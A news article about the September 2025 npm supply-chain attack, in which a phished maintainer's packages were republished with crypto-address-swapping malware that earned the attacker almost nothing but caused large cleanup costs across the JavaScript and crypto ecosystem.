The largest hack in software supply chain history has shaken the entire JavaScript and crypto ecosystem. Billions of infected downloads, Ethereum and Solana wallets targeted, developers forced to react urgently. And yet: in the end, the attacker only collected… a few cents of ether and a handful of illiquid memecoins.
A brutal paradox: the scale of the attack is colossal, but the direct financial impact remains minuscule. The costs, however, lie elsewhere, in hours of work, forced updates, and now-entrenched mistrust at the heart of the web.
How the NPM hack took shape
It all started with a simple phishing email. Maintainer developer “qix,” creator of major libraries like chalk or debug-js, had his NPM credentials stolen. With complete access, the attacker republished corrupted versions of all his packages, downloaded billions of times weekly.
The malicious code was sneaky: it checked for window.ethereum in the browser and intercepted key wallet functions like approve or transfer. As a result, transactions were redirected to a single Ethereum address. On Solana, transfers were completely broken, replaced by invalid chains.
Even more cunning, the malware scanned network requests for crypto addresses and replaced them with 280 visually similar variants. A true next-generation “crypto-clipper.”
A mountain for a mouse
Despite this sophistication, the gains are ridiculous: five cents of ETH and around 20 dollars of an obscure memecoin. The report released on Tuesday by Security Alliance confirms that the attacker left empty-handed, or close to it.
But the story doesn’t end there. Behind this apparent weakness, another cost emerges: that of cleanup. Security teams must audit, fix, update. Every backend dependent on compromised libraries must be reviewed, and that bill amounts to millions.
Reactions from the crypto ecosystem
Ledger, through its CTO Charles Guillemet, noted that the infected packages totaled over a billion downloads and were designed to replace addresses in transactions undetectably. A clear warning: the threat was serious, even if the financial gains do not reflect it.
MetaMask, Rabby, Phantom: major wallets and apps quickly reassured their user base: the vast majority of the ecosystem is not affected. But mistrust remains for those using unprotected environments.
The real issue
This hack is a stark reminder: vulnerability lies not only in blockchains but also in the tools we use to make them work. A single tainted email can compromise billions of downloads and endanger the entire crypto ecosystem.
In September 2025, at a time when attracting ‘normies’ is still challenging, the conclusion is clear: even when hackers leave with almost empty pockets, the bill for the community is gigantic. And trust will take time to rebuild.
